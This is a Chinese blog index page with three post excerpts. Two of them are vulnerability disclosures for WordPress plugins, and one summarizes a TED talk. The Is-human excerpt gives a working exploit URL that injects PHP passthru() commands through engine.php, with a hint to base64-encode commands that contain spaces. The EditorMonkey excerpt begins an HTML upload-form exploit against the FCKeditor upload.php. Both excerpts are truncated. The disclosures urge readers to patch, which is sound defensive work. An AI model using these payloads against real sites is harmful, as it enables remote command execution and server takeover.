Pray's Blog

Is-human是WordPress的一个发表评论验证插件。 这个插件的漏洞能导致远程命令执行。 以下是BUG原理，各位博友赶快修复。 EXP： server/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();passthru(whoami);error 其中，passthru(whoami)这里可以执行任意命令，比如ls，uname等。但uname -a， wget等无法执行，含有空格。需要base64编码。 EXP： server/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();e...阅读更多

依 知识共享协议-署名·非商业·拒绝演绎(CC-BY-NC-ND) 授权发布。 美国华裔天才儿童邹奇奇演讲：“大人能从小孩身上学到什么？” 精彩观点： 1.”幼稚”这个词是常常从大人身上看到的。 2.孩子的大胆想象拓宽了可能性的疆界。 3.孩子喜欢挑战，大人应提供环境，鼓励尝试，但不要太过设限。 4.不要让孩子变成你们这样的大人， 而是比你们强的大人。 文章地址:http://blog.nodll.com/2011/05/17/ted-lecture/Pray.html 阅读更多

WordPress插件EditorMonkey存在上传BUG。 用Windows 2003系统的博友请注意了。 这BUG也就是Fckeditor的上传BUG。所以WP博友还是用自带的编辑器安全一点。 BUG关键字：plugins/editormonkey   EXP： 1 2 3 4 5 <form id="frmUpload" enctype="multipart/form-data" action=http://BUG网站/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method="post"> Upload a new file:<br> <...阅读更多